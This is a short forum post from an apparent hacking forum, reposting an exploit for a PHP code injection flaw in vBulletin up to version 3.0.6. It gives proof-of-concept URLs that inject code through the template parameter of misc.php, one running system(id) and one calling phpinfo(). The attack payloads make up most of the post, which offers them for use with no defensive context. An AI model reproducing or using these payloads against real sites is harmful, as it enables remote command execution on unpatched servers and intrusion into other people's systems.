vBulletin <= 3.0.6 php Code Injection

Go down

vBulletin <= 3.0.6 php Code Injection

Mesaj  neo on Wed Oct 22, 2008 4:42 pm

# Tested on vBulletin Version 3.0.1 /str0ke
# http://www.xxx.net/misc.php?do=page&template={${system(id)}}
#

# [SCAN Associates Security Advisory]
# http://www.scan-associates.net

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}


KURDISH HACKERZ
avatar
neo
Admin

Hejmara NŻÁeyan : 27
Join date : 2008-06-10
Age : 24
Welat : kurdistan

ProfÓla bikarhÍnerÍ bibÓne http://hack3r.forumku.net

Vegere jor Go down

Vegere jor


 
Permissions in this forum:
Tu nikarÓ bersÓv bide ser mesajÍn li ser vÍ forumÍ.